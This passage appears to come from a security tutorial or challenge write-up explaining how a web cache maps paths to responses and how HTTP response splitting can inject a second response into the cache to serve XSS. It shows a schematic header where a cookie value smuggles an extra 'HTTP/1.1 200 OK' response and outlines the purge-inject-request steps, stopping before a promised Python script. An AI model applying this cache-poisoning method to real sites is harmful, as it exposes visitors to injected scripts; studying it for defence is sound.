Brief explanation of how the cache works
To exploit this vulnerability we have to understand how the cache works. To increase the response speed, the cache stores server response linked to requests like this:
/login => login page /admin => admin page /register => register page /posts => posts page
So when we make a request on /posts for example, the cache send us server response linked to /posts.
What is HTTP Response Splitting ?
HTTP Response Splitting is a type of CRLF where the purpose is to inject a second response.
HTTP/1.1 302 FOUND [...] Set-Cookie: theme=dark HTTP/1.1 200 OK [...]
How can this be used to exploit an XSS ?
First, we have to empty cache to delete all responses linked to requests or we’ll not be able to update them. Secondly, we have to make our injection. Finally, we have to make a request for the page we want to link the injected response. We can perform it with a little python script: